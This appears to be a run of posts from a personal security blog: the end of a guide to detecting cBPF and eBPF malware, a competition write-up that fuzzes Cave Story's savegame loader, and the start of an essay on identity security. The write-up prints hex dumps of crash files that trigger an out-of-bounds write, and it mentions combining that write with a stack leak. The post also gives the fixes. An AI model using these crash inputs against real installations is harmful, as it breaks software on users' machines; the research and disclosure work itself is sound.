<span class="mo">0000</span><span class="n">d65c</span> <span class="n">memcpy</span><span class="p">(</span><span class="n">rax_10</span> <span class="o">+</span> <span class="mh">0x1d0</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="n">arg4</span> <span class="o">+</span> <span class="mi">8</span><span class="p">),</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="o">*</span><span class="n">arg4</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">3</span><span class="p">)</span>
<span class="mo">0000</span><span class="n">d664</span> <span class="kt">int16_t</span> <span class="n">var_38</span> <span class="o">=</span> <span class="n">var_58</span><span class="p">.</span><span class="n">w</span>
<span class="mo">0000</span><span class="n">d66c</span> <span class="kt">uint64_t</span> <span class="n">var_30</span> <span class="o">=</span> <span class="n">rax_10</span>
<span class="mo">0000</span><span class="n">d69f</span> <span class="k">return</span> <span class="n">syscall</span><span class="p">(</span><span class="mh">0x36</span><span class="p">,</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="n">arg1</span><span class="p">),</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="n">arg2</span><span class="p">),</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="n">arg3</span><span class="p">),</span> <span class="o">&</span><span class="n">var_38</span><span class="p">,</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="n">arg5</span><span class="p">))</span>
</code></pre></div></div>
<p>That syscall number, <code class="language-plaintext highlighter-rouge">0x36</code>, is <code class="language-plaintext highlighter-rouge">setsockopt</code>. This is a cBPF filter.</p>
<p>Alright, what about BPFdoor? The source code for that allegedly got leaked, and
we can see that it indeed uses cBPF<sup id="fnref:16" role="doc-noteref"><a href="#fn:16" class="footnote" rel="footnote">13</a></sup>. This sources matches what can be seen
from captured samples, so it should be pretty safe to say eBPF is not used here.</p>
<p>But certainly someone is using eBPF maliciously, right? Probably! But if it
exists, we aren’t looking in the right places for it. There are a number of
academic projects demonstrating the capabilities of eBPF for malware, and they
are impressive. TripleCross <sup id="fnref:10" role="doc-noteref"><a href="#fn:10" class="footnote" rel="footnote">14</a></sup> is a comprehensive rootkit built on eBPF, as
are ebpfkit <sup id="fnref:11" role="doc-noteref"><a href="#fn:11" class="footnote" rel="footnote">15</a></sup> and boopkit <sup id="fnref:12" role="doc-noteref"><a href="#fn:12" class="footnote" rel="footnote">16</a></sup>. But again, either eBPF is being avoided by
malware authors in the wild, or we simply aren’t looking hard enough.</p>
<h1 id="filtering-the-filter">Filtering the Filter</h1>
<p>Okay, great, so we know that eBPF and cBPF are different and that malware tends
to prefer cBPF. How do we actually defend against it? Even without in the wild
samples the capabilities of eBPF malware have been clearly demonstrated and we
probably want to protect ourselves from both.</p>
<h2 id="classical-detections">Classical Detections</h2>
<p>There are a few ways to attach cBPF filters. We can see them by checking for
places in the kernel where <code class="language-plaintext highlighter-rouge">struct sock_fprog</code> is used<sup id="fnref:17" role="doc-noteref"><a href="#fn:17" class="footnote" rel="footnote">17</a></sup>. We find five
methods, one of which is most common.</p>
<p>The first, which is what malware mostly uses, is to call <code class="language-plaintext highlighter-rouge">setsockopt</code> with the
<code class="language-plaintext highlighter-rouge">SO_ATTACH_FILTER</code> option. This does exactly what it sounds like, you tell the
kernel you want to attach a filter to a socket. Similarly, you can call
<code class="language-plaintext highlighter-rouge">setsockopt</code> on a <code class="language-plaintext highlighter-rouge">packet</code> socket with <code class="language-plaintext highlighter-rouge">PACKET_FANOUT_DATA</code> to attach a filter
to a fanout socket. The type determines what kind of BPF filter gets attached,
either <code class="language-plaintext highlighter-rouge">PACKET_FANOUT_CBPF</code> for cBPF or <code class="language-plaintext highlighter-rouge">PACKET_FANOUT_EBPF</code> for eBPF. Note that
this does not bypass the <code class="language-plaintext highlighter-rouge">bpf()</code> syscall for eBPF, as you may not pass in an
eBPF program directly. Instead, you must pass in an eBPF program file descriptor
returned by the <code class="language-plaintext highlighter-rouge">bpf()</code> syscall. For cBPF, on the other hand, you may pass in
the filter program directly.</p>
<p>The next way is to call <code class="language-plaintext highlighter-rouge">prctl</code> with the <code class="language-plaintext highlighter-rouge">PR_SET_SECCOMP</code> option and the first
argument set to <code class="language-plaintext highlighter-rouge">SECCOMP_MODE_FILTER</code>. Like <code class="language-plaintext highlighter-rouge">setsockopt</code>, this will take an
array of <code class="language-plaintext highlighter-rouge">sock_filter</code> structs (i.e., a cBPF program). The fourth and fifth ways
are both <code class="language-plaintext highlighter-rouge">ioctl</code> calls on <code class="language-plaintext highlighter-rouge">tun</code> and <code class="language-plaintext highlighter-rouge">ppp</code> devices. The <code class="language-plaintext highlighter-rouge">TUNATTACHFILTER</code> <code class="language-plaintext highlighter-rouge">ioctl</code>
attaches a cBPF filter to a <code class="language-plaintext highlighter-rouge">tun</code> device. The <code class="language-plaintext highlighter-rouge">PPPIOCSPASS</code>, <code class="language-plaintext highlighter-rouge">PPPIOCSACTIVE</code>,
<code class="language-plaintext highlighter-rouge">PPPCIOSPASS32</code>, and <code class="language-plaintext highlighter-rouge">PPPCIOSACTIVE32</code> <code class="language-plaintext highlighter-rouge">ioctl</code>s all attach cBPF filters to <code class="language-plaintext highlighter-rouge">ppp</code>
devices.</p>
<p>By monitoring these three calls for these five patterns, we can observe whenever
a cBPF program is loaded. We can also simplify pattern matching on <code class="language-plaintext highlighter-rouge">setsockopt</code>,
<code class="language-plaintext highlighter-rouge">prctl</code>, and <code class="language-plaintext highlighter-rouge">ioctl</code> syscalls by observing the <code class="language-plaintext highlighter-rouge">bpf_prog_create_from_user</code>
kernel function, <code class="language-plaintext highlighter-rouge">sk_attach_filter</code> kernel function, and <code class="language-plaintext highlighter-rouge">get_filter</code> kernel
function. The <code class="language-plaintext highlighter-rouge">bpf_prog_create_from_user</code> function is used by the packet fanout
filter and SECCOMP filters. The <code class="language-plaintext highlighter-rouge">sk_attach_filter</code> function is used by the
standard socket filter and <code class="language-plaintext highlighter-rouge">tun</code> driver. And finally, <code class="language-plaintext highlighter-rouge">get_filter</code> is used by
the <code class="language-plaintext highlighter-rouge">ppp</code> driver.</p>
<p>Note that is it possible to attach a socket filter using the <code class="language-plaintext highlighter-rouge">bpf</code> syscall, with
<code class="language-plaintext highlighter-rouge">BPF_PROG_TYPE_SOCKET_FILTER</code>. However, the supplied bytecode here must be eBPF
bytecode (remember, eBPF is not a superset of cBPF) so this is really just a
special case of loading an eBPF program.</p>
<h2 id="extended-detections">Extended Detections</h2>
<p>Detecting eBPF is significantly easier. No matter what else you want to do with
it, you’ll need to load your program with the <code class="language-plaintext highlighter-rouge">bpf</code> syscall. After that, there’s
a ton of stuff that can be done to attach to filter to so, so many different
things. But that <code class="language-plaintext highlighter-rouge">bpf</code> call must always be there. If we want to detect eBPF,
we only have to monitor this one point in the kernel.</p>
<h1 id="can-you-summarize-that-for-me">Can you summarize that for me?</h1>
<p>Sure. BPF is an umbrella term for both cBPF and eBPF, which are very different.
If you’re concerned about BPF in malware you most likely want to be watching
<code class="language-plaintext highlighter-rouge">sk_attach_filter</code>, which is cBPF. If you’re concerned about eBPF in malware you
only need to worry about the <code class="language-plaintext highlighter-rouge">bpf</code> syscall.</p>
<h1 id="references">References</h1>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:1" role="doc-endnote">
<p><a href="https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat">https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat</a> <a href="#fnref:1" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:2" role="doc-endnote">
<p><a href="https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor">https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor</a> <a href="#fnref:2" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:3" role="doc-endnote">
<p><a href="https://sysdig.com/blog/bpfdoor-falco-detection/">https://sysdig.com/blog/bpfdoor-falco-detection/</a> <a href="#fnref:3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:4" role="doc-endnote">
<p><a href="https://news.ycombinator.com/item?id=33489935">https://news.ycombinator.com/item?id=33489935</a> <a href="#fnref:4" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:5" role="doc-endnote">
<p><a href="https://www.kernel.org/doc/html/v6.0/bpf/bpf_licensing.html#background">https://www.kernel.org/doc/html/v6.0/bpf/bpf_licensing.html#background</a> <a href="#fnref:5" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:8" role="doc-endnote">
<p>Steven McCanne and Van Jacobson. 1993. The BSD packet filter: a new architecture for user-level packet capture. In Proceedings of the USENIX Winter 1993 Conference Proceedings on USENIX Winter 1993 Conference Proceedings (USENIX’93). USENIX Association, Berkeley, CA, USA, 2-2. [http://www.tcpdump.org/papers/bpf-usenix93.pdf] <a href="#fnref:8" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:14" role="doc-endnote">
<p><a href="https://lwn.net/Articles/475043/">https://lwn.net/Articles/475043/</a> <a href="#fnref:14" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:9" role="doc-endnote">
<p><a href="https://man7.org/linux/man-pages/man2/bpf.2.html">https://man7.org/linux/man-pages/man2/bpf.2.html</a> <a href="#fnref:9" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:6" role="doc-endnote">
<p><a href="https://www.kernel.org/doc/html/v6.0/bpf/classic_vs_extended.html">https://www.kernel.org/doc/html/v6.0/bpf/classic_vs_extended.html</a> <a href="#fnref:6" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:15" role="doc-endnote">
<p><a href="https://www.kernel.org/doc/html/v6.0/bpf/classic_vs_extended.html#opcode-encoding">https://www.kernel.org/doc/html/v6.0/bpf/classic_vs_extended.html#opcode-encoding</a> <a href="#fnref:15" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pedantic" role="doc-endnote">
<p>I suppose C++ is not strictly a superset of C, due to differences in behaviors in the specs. But it’s close enough for this metaphor. <a href="#fnref:pedantic" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:7" role="doc-endnote">
<p>Evolution of Stealth Packet Filters, Hushcon Seattle 2022, Richard Johnson (@richinseattle) at Fuzzing IO / Trellix <a href="#fnref:7" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:16" role="doc-endnote">
<p><a href="https://github.com/snapattack/bpfdoor-scanner/blob/main/sample/bpfdoor.c#L462">https://github.com/snapattack/bpfdoor-scanner/blob/main/sample/bpfdoor.c#L462</a> <a href="#fnref:16" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:10" role="doc-endnote">
<p><a href="https://github.com/h3xduck/TripleCross">https://github.com/h3xduck/TripleCross</a> <a href="#fnref:10" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:11" role="doc-endnote">
<p><a href="https://github.com/Gui774ume/ebpfkit">https://github.com/Gui774ume/ebpfkit</a> <a href="#fnref:11" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:12" role="doc-endnote">
<p><a href="https://github.com/krisnova/boopkit">https://github.com/krisnova/boopkit</a> <a href="#fnref:12" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:17" role="doc-endnote">
<p><a href="https://elixir.bootlin.com/linux/latest/C/ident/sock_fprog">https://elixir.bootlin.com/linux/latest/C/ident/sock_fprog</a> <a href="#fnref:17" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>Friday OrtizTL;DR: Let’s detect malware that uses BPF the right way. eBPF has become a hot topic, which leads to some hype whenever BPF is found in malware. The thing is, BPF malware is nothing new and most malware is using cBPF, not eBPF. Conflating cBPF with eBPF is harmful to defenders, who really need to understand the difference between the two when writing detections.Never Stop Reading: Crashing the HaikuOS Port of Cave Story2022-07-17T05:00:00+00:002022-07-17T05:00:00+00:00https://ortiz.sh/identity/2022/07/17/BGGP3<p><strong>TL;DR:</strong> Cave Story for HaikuOS go SEGV.</p>
<h2 id="bggp3">BGGP3</h2>
<p>The Binary Golf Grand Prix is an annual competition (three years now, that
counts) where you Golf (do fun stuff to) Binary files. The first year had
people create tiny ambigram binaries. The second year involved polyglots. This
year’s Binary Golf Grand Prix (BGGP3) is all about finding tiny crashes. We
want to find the smallest possible input to a program that will crash it and,
ideally, let us take over control flow.<sup id="fnref:bggp3" role="doc-noteref"><a href="#fn:bggp3" class="footnote" rel="footnote">1</a></sup></p>
<p>At around the same time BGGP3 was announced, a friend of mine mentioned that
Cave Story had been ported to HaikuOS<sup id="fnref:csru" role="doc-noteref"><a href="#fn:csru" class="footnote" rel="footnote">2</a></sup>. I thought aloud, “wouldn’t it be
hilarious to find a tiny crash in the Cave Story port to HaikuOS?” And so it
was. I ended up finding a crash in both the HaikuOS version (the original
<code class="language-plaintext highlighter-rouge">NXEngine</code>), and the version that gets bundled into most Linux distributions
(<code class="language-plaintext highlighter-rouge">nxengine-evo</code>).</p>
<h2 id="fuzzing-cave-story">Fuzzing Cave Story</h2>
<p>The first step was to find an appropriate source and sink in Cave Story to
target with fuzzing. By playing the game a little bit and downloading a local
copy of the source code, I decided to use the <code class="language-plaintext highlighter-rouge">player.dat</code> savegame files as an
input, with the target being the <code class="language-plaintext highlighter-rouge">profile_load</code> function which parses and loads
the profile files. To hit this function directly, I simply modified the start
of the <code class="language-plaintext highlighter-rouge">main</code> function in <code class="language-plaintext highlighter-rouge">main.cpp</code> to attempt to load any profile we pass in
on the command line.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include "profile.h"
#include "profile.fdh"
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
<span class="n">Profile</span> <span class="n">p</span><span class="p">;</span>
<span class="n">profile_load</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&</span><span class="n">p</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>
<p>Next, I created <code class="language-plaintext highlighter-rouge">afi/</code> and <code class="language-plaintext highlighter-rouge">afo/</code> folders for AFL++ to store input and output
files, respectively. I copied some of the legitimate <code class="language-plaintext highlighter-rouge">profile.dat</code> files into
<code class="language-plaintext highlighter-rouge">afi/</code> and let it run with <code class="language-plaintext highlighter-rouge">afl-fuzz -t 5000 -n -i afi -o afo ./nx @@</code>. This
just happened to be the format of the <code class="language-plaintext highlighter-rouge">afl-fuzz</code> command most recently in my
history, I can’t even remember what the options all mean. I didn’t expect this
to work, but it found several crashes almost immediately.</p>
<h2 id="analyzing-the-crashes">Analyzing the Crash(es)</h2>
<p>There were two crashes found, a 60 byte crash (the “large” crash) and an 8 byte
crash (the “small” crash). I’ll be using the source code from the original
NXEngine to demonstrate, but the vulnerable <code class="language-plaintext highlighter-rouge">profile_load</code> function is the same
in both the <code class="language-plaintext highlighter-rouge">NXEngine</code> and <code class="language-plaintext highlighter-rouge">nxengine-evo</code> repositories.</p>
<h3 id="the-large-crash-60-bytes">The Large Crash (60 bytes)</h3>
<p><a href="/download/profile.dat_60byte">Download Here</a></p>
<p>Let’s start with the large crash, since it’s more robust. The beginning of the
file, the <code class="language-plaintext highlighter-rouge">Do041220</code> string, is a magic value that the loader uses to determine
if this is even a valid <code class="language-plaintext highlighter-rouge">profile.dat</code> save file. We can go ahead and ignore all
the intermediary bytes up until that last <code class="language-plaintext highlighter-rouge">0x5C</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000: 446f 3034 3132 3230 0d00 0000 0800 0000 Do041220........
00000010: 2de6 0100 20e0 0000 0200 0000 0300 0000 -... ...........
00000020: 0300 0000 0000 0000 0000 0000 0000 0000 ................
00000030: 0000 0000 0000 0000 0000 005c ...........\
</code></pre></div></div>
<p>Let’s look at the original section of the code that loads the player’s weapons
from this file. As you can see, there’s a <code class="language-plaintext highlighter-rouge">u32</code> that gets read from the file
and stored in the <code class="language-plaintext highlighter-rouge">int type</code>. This ends up being our <code class="language-plaintext highlighter-rouge">0x5C</code> value, but as a
little endian <code class="language-plaintext highlighter-rouge">u32</code>, thus it gets read as <code class="language-plaintext highlighter-rouge">0x5C000000</code>. Further down, when we
try to access <code class="language-plaintext highlighter-rouge">file->weapons[type]</code> we end up trying to write to a memory
location way out of bounds, and we segfault.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// load weapons</span>
<span class="n">fseek</span><span class="p">(</span><span class="n">fp</span><span class="p">,</span> <span class="n">PF_WEAPONS_OFFS</span><span class="p">,</span> <span class="n">SEEK_SET</span><span class="p">);</span>
<span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="n">i</span><span class="o"><</span><span class="n">MAX_WPN_SLOTS</span><span class="p">;</span><span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">type</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">type</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">level</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">xp</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">maxammo</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">ammo</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="n">file</span><span class="o">-></span><span class="n">weapons</span><span class="p">[</span><span class="n">type</span><span class="p">].</span><span class="n">hasWeapon</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="n">file</span><span class="o">-></span><span class="n">weapons</span><span class="p">[</span><span class="n">type</span><span class="p">].</span><span class="n">level</span> <span class="o">=</span> <span class="p">(</span><span class="n">level</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">file</span><span class="o">-></span><span class="n">weapons</span><span class="p">[</span><span class="n">type</span><span class="p">].</span><span class="n">xp</span> <span class="o">=</span> <span class="n">xp</span><span class="p">;</span>
<span class="n">file</span><span class="o">-></span><span class="n">weapons</span><span class="p">[</span><span class="n">type</span><span class="p">].</span><span class="n">ammo</span> <span class="o">=</span> <span class="n">ammo</span><span class="p">;</span>
<span class="n">file</span><span class="o">-></span><span class="n">weapons</span><span class="p">[</span><span class="n">type</span><span class="p">].</span><span class="n">maxammo</span> <span class="o">=</span> <span class="n">maxammo</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="n">curweaponslot</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">file</span><span class="o">-></span><span class="n">curWeapon</span> <span class="o">=</span> <span class="n">type</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="the-small-crash-8-bytes">The Small Crash (8 bytes)</h3>
<p><a href="/download/profile.dat_8byte">Download Here</a></p>
<p>This crash isn’t as reliable, but I think it’s more fun. I can only replicate
this crash in the original NXEngine version of the code, and only if calling
<code class="language-plaintext highlighter-rouge">profile_load</code> directly from <code class="language-plaintext highlighter-rouge">main</code>. It won’t work if we let the game launch
normally and pick up the corrupt <code class="language-plaintext highlighter-rouge">profile.dat</code> file. As you can see, this crash
file consists of <em>only</em> the magic value.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000: 446f 3034 3132 3230 Do041220
</code></pre></div></div>
<p>How does this lead to a crash? Easy! The original code doesn’t do any end of
file checking or error checking when reading the <code class="language-plaintext highlighter-rouge">profile.dat</code> file. When this
file is loaded, the <code class="language-plaintext highlighter-rouge">fgeti</code> and <code class="language-plaintext highlighter-rouge">fgetl</code> wrappers start returning random garbage
stack values instead. This is likely why the crash is inconsistent. For
whatever reason, when invoking the function directly, the garbage returned by
<code class="language-plaintext highlighter-rouge">fgeti</code> and <code class="language-plaintext highlighter-rouge">fgetl</code> leads to a crash, similar to the large crash, with a large
positive or negative <code class="language-plaintext highlighter-rouge">type</code> value. When loading the profile normally, it only
reads null bytes, which doesn’t cause a crash, until the parser fails and
rejects the file because of a lack of secondary magic value (the string “FLAG”)
further down in the file.</p>
<p>If we allow execution of this small crash to proceed until <code class="language-plaintext highlighter-rouge">fgetl</code> is called to
determine <code class="language-plaintext highlighter-rouge">type</code>, we can see the following in <code class="language-plaintext highlighter-rouge">gdb</code>.</p>
<pre><code class="language-gdb">(gdb) info locals
value = 32767
(gdb) p &value
$1 = (uint32_t *) 0x7fffffffc594
</code></pre>
<p>If we dump memory at that address, we see it’s just whatever garbage was
previously on the stack there.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) x/16bx &value
0x7fffffffc594: 0xff 0x7f 0x00 0x00 0x00 0x27 0x5f 0x5e
0x7fffffffc59c: 0xaa 0x5b 0x49 0x7c 0x00 0xdf 0x55 0x55
</code></pre></div></div>
<p>Absent of any checks, the <code class="language-plaintext highlighter-rouge">fgetl</code> and <code class="language-plaintext highlighter-rouge">fgeti</code> functions just return information
off the stack. I’m speculating here, but this could be used as a memory leak
which could be combined with the arbitrary write in the weapon slots to do some
fun stuff, maybe.</p>
<h2 id="fixing-the-crash">Fixing the Crash</h2>
<p>First off, we check the results of the <code class="language-plaintext highlighter-rouge">fread</code> call and use that to determine
if we should bail early. If we hit an error or end of file when we don’t expect
it? Just stop trying to parse the file. Nothing good can come of it. In the
below example, you see we check that the amount of data read from the file is
what we expect and if not, we error out.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">uint32_t</span> <span class="nf">fgetl</span><span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="n">fp</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">value</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="o">&</span><span class="n">value</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">fp</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">staterr</span><span class="p">(</span><span class="s">"fgetl: error reading uint32_t from file"</span><span class="p">);</span>
<span class="n">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">return</span> <span class="n">value</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Next, we want to make sure the weapon type is something we expect before we
start blinding writing memory. The fix here is to check if <code class="language-plaintext highlighter-rouge">type</code> is within the
bounds of <code class="language-plaintext highlighter-rouge">MAX_WPN_SLOTS</code> and, if not, skip it. I didn’t include any logic to
keep chewing through the file, so it’s possible a corrupted save will cause the
file to get off by one byte, which would cause the wrong thing to be loaded.
But it shouldn’t crash anymore, so that’s probably fine.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="n">i</span><span class="o"><</span><span class="n">MAX_WPN_SLOTS</span><span class="p">;</span><span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">type</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">type</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">type</span> <span class="o"><</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">type</span> <span class="o">>=</span> <span class="n">MAX_WPN_SLOTS</span><span class="p">)</span> <span class="p">{</span>
<span class="n">staterr</span><span class="p">(</span><span class="s">"profile_load: invalid weapon type %d"</span><span class="p">,</span> <span class="n">type</span><span class="p">);</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<h2 id="tallying-the-score">Tallying the Score</h2>
<p>So we have two scores here, I’d say. One for the large crash (that works out of
the box on the current package for both Linux and HaikuOS) and the other,
smaller, crash which takes some luck to get going.</p>
<h3 id="large-crash">Large Crash</h3>
<ul>
<li>+4096 - 60 = +4036 points for the binary size</li>
<li>+1024 writeup</li>
<li>+4096 patches merged (<sup id="fnref:pr1" role="doc-noteref"><a href="#fn:pr1" class="footnote" rel="footnote">3</a></sup>, <sup id="fnref:pr2" role="doc-noteref"><a href="#fn:pr2" class="footnote" rel="footnote">4</a></sup>, <sup id="fnref:pr3" role="doc-noteref"><a href="#fn:pr3" class="footnote" rel="footnote">5</a></sup>, <sup id="fnref:pr4" role="doc-noteref"><a href="#fn:pr4" class="footnote" rel="footnote">6</a></sup>)</li>
</ul>
<p><strong>Total: 9156</strong></p>
<h3 id="small-crash">Small Crash</h3>
<ul>
<li>+4096 - 8 = +4088</li>
<li>+1024 writeup</li>
<li>+4096 patches merged</li>
</ul>
<p><strong>Total: 9208</strong></p>
<h3 id="do-i-win">Do I win?</h3>
<p>The small crash probably doesn’t count, and I don’t know if crashing the Cave
Story port on HaikuOS is more or less comical than crashing GnuCOBOL, so I may
need another way to beat Remy’s score of 9176.<sup id="fnref:remirino" role="doc-noteref"><a href="#fn:remirino" class="footnote" rel="footnote">7</a></sup></p>
<h3 id="results-update">Results Update</h3>
<p>The official results are in!<sup id="fnref:awinnerisu" role="doc-noteref"><a href="#fn:awinnerisu" class="footnote" rel="footnote">8</a></sup> The scorer accepted by smaller crash,
giving me a slight edge over Remy and putting me in fourth place! Shoutout to
<a href="https://retr0.id/retr0id">retr0id</a> for his first place chip8 bug. While you’re
there, check out his MD5 PNG hashquine. It makes a great phone background!</p>
<h1 id="references">References</h1>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:bggp3" role="doc-endnote">
<p><a href="https://tmpout.sh/bggp/3/">https://tmpout.sh/bggp/3/</a> <a href="#fnref:bggp3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:csru" role="doc-endnote">
<p><a href="https://exlmoto.ru/nxengine/">https://exlmoto.ru/nxengine/</a> <a href="#fnref:csru" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pr1" role="doc-endnote">
<p><a href="https://github.com/EXL/NXEngine/pull/9">https://github.com/EXL/NXEngine/pull/9</a> <a href="#fnref:pr1" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pr2" role="doc-endnote">
<p><a href="https://github.com/nxengine/nxengine-evo/pull/272">https://github.com/nxengine/nxengine-evo/pull/272</a> <a href="#fnref:pr2" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pr3" role="doc-endnote">
<p><a href="https://github.com/nxengine/nxengine-evo/pull/273">https://github.com/nxengine/nxengine-evo/pull/273</a> <a href="#fnref:pr3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pr4" role="doc-endnote">
<p><a href="https://github.com/EXL/NXEngine/pull/10">https://github.com/EXL/NXEngine/pull/10</a> <a href="#fnref:pr4" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:remirino" role="doc-endnote">
<p><a href="https://remyhax.xyz/posts/bggp3-cob/">https://remyhax.xyz/posts/bggp3-cob/</a> <a href="#fnref:remirino" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:awinnerisu" role="doc-endnote">
<p><a href="https://github.com/netspooky/BGGP/tree/main/2022">https://github.com/netspooky/BGGP/tree/main/2022</a> <a href="#fnref:awinnerisu" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>Friday OrtizTL;DR: Cave Story for HaikuOS go SEGV.whoami, who am I? Thoughts on protecting digital and human identities.2022-04-26T05:00:00+00:002022-04-26T05:00:00+00:00https://ortiz.sh/identity/2022/04/26/WHOAMI<p><strong>TL;DR:</strong> What is identity security, why we often do it wrong, and how we can get it right.</p>
<p>I started digging into identity and identity security concepts earlier this
year in order to help my employer integrate more identity-based security
controls and telemetry into its products. I’ve dabbled in identity for years,
but I’d never formally studied it. Naturally, I started reading whitepapers,
blogs, and websites, and learned a ton in the process. However, I also came
away with the sense that we’re collectively making a lot of the same mistakes
about identity.</p>
<p>In this article, I’m going to explore some existing definitions of identity,
attempt to land on my own definition, and discuss where things can go right or
wrong.</p>
<h2 id="so-what-the-hecks-an-identity">So, what the heck’s an identity?</h2>
<p>How do we answer this question? Let’s start with the prior art. What does
existing literature say an identity is? Here’s a pair of examples:</p>
